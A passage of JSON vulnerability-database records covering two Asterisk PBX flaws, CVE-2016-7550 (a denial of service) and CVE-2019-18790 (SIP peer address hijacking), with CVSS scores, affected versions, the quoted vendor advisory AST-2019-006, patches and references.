"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-7550",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-16531",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-7550",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-7550",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-16531",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-972",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-7550",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-16531",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"id": "VAR-201905-0637",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
]
},
"last_update_date": "2023-12-18T13:02:13.874000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2016-006",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
},
{
"title": "Patch for DigiumAsterisk Denial of Service Vulnerability (CNVD-2019-16531)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/163053"
},
{
"title": "Digium Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92924"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-7550"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7550"
},
{
"trust": 0.6,
"url": "https://web.nvd.nist.gov//vuln/detail/cve-2016-7550"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"date": "2019-05-23T19:29:00.243000",
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"date": "2019-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"date": "2019-05-24T17:12:45.697000",
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"date": "2019-05-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "asterisk In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
],
"trust": 0.6
}
}
VAR-201911-0701
Vulnerability from variot - Updated: 2023-12-18 12:27An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service.
Nature of Advisory Denial of Service
Susceptibility Remote Unauthenticated Sessions
Severity Minor
Exploits Known No
Reported On October 17, 2019
Reported By Andrey V. T.
Modules Affected channels/chan_sip.c
Resolution Using any other option value for “nat” will prevent the
attack (such as “nat=no” or “nat=force_rport”), but will
need to be tested on an individual basis to ensure that it
works for the user’s deployment. On the fixed versions of
Asterisk, it will no longer set the address of the peer
before authentication is successful when a SIP request comes
in.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All releases
Asterisk Open Source 16.x All releases
Asterisk Open Source 17.x All releases
Certified Asterisk 13.21 All releases
Corrected In
Product Release
Asterisk Open Source 13.29.2
Asterisk Open Source 16.6.2
Asterisk Open Source 17.0.1
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16
http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17
http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28589
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at
http://downloads.digium.com/pub/security/AST-2019-006.pdf and
http://downloads.digium.com/pub/security/AST-2019-006.html
Revision History
Date Editor Revisions Made
October 22, 2019 Ben Ford Initial Revision
November 14, 2019 Ben Ford Corrected and updated fields for
versioning, and added CVE
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory - AST-2019-006
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-0701",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.1"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "16.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "16.6.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.2"
},
{
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "16.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "17.x"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.21"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=16.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=17.*"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.6,
"vendor": "sangoma",
"version": "13.21"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "13.29.2",
"versionStartIncluding": "13.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "16.6.2",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "17.0.1",
"versionStartIncluding": "17.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bford",
"sources": [
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.7
},
"cve": "CVE-2019-18790",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-18790",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-03059",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-18790",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-18790",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2020-03059",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1291",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service. \n Nature of Advisory Denial of Service \n Susceptibility Remote Unauthenticated Sessions \n Severity Minor \n Exploits Known No \n Reported On October 17, 2019 \n Reported By Andrey V. T. \n Modules Affected channels/chan_sip.c \n\n Resolution Using any other option value for \u201cnat\u201d will prevent the \n attack (such as \u201cnat=no\u201d or \u201cnat=force_rport\u201d), but will \n need to be tested on an individual basis to ensure that it \n works for the user\u2019s deployment. On the fixed versions of \n Asterisk, it will no longer set the address of the peer \n before authentication is successful when a SIP request comes \n in. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All releases \n Asterisk Open Source 16.x All releases \n Asterisk Open Source 17.x All releases \n Certified Asterisk 13.21 All releases \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Asterisk Open Source 16.6.2 \n Asterisk Open Source 17.0.1 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16 \n http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17 \n http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28589 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at \n http://downloads.digium.com/pub/security/AST-2019-006.pdf and \n http://downloads.digium.com/pub/security/AST-2019-006.html \n\n Revision History\n Date Editor Revisions Made \n October 22, 2019 Ben Ford Initial Revision \n November 14, 2019 Ben Ford Corrected and updated fields for \n versioning, and added CVE \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory - AST-2019-006\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "PACKETSTORM",
"id": "155434"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18790",
"trust": 3.1
},
{
"db": "DLINK",
"id": "SAP10005",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "155434",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-03059",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4526",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"id": "VAR-201911-0701",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
}
]
},
"last_update_date": "2023-12-18T12:27:54.903000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2019-006",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "[SECURITY] [DLA 2017-1] asterisk security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/196959"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=103433"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18790"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18790"
},
{
